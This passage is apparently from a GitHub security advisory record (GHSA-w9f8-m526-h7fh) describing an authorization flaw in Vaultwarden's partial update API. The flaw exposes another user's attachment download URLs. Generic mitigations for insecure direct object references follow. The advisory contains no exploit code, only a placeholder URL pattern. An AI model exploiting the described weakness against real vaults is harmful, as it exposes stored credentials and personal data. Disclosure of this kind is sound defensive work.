filesystem (FS) deployments, this returns a tokenized endpoint such as:\n\n```\n/attachments/\u003ccipher\u003e/\u003cfile\u003e?token=...\n```\n\nIn object storage deployments, it returns a short-lived pre-signed URL.\n\nAs a result, an attacker can use these URLs to directly download attachment data that they are not authorized to access.\n\nThis can lead to disclosure of sensitive information stored in the Vault, including personal data and authentication credentials. Such exposure may further result in account compromise, lateral movement, and other secondary impacts.",
  "id": "GHSA-w9f8-m526-h7fh",
  "modified": "2026-03-04T20:14:06Z",
  "published": "2026-03-04T20:14:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-w9f8-m526-h7fh"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dani-garcia/vaultwarden"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vaultwarden has Unauthorized Access via Partial Update API on Another User\u2019s Cipher"
}

Mitigation
Architecture and Design

For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.

Mitigation
Architecture and Design Implementation

Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.

Mitigation
Architecture and Design

Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.

No CAPEC attack patterns related to this CWE.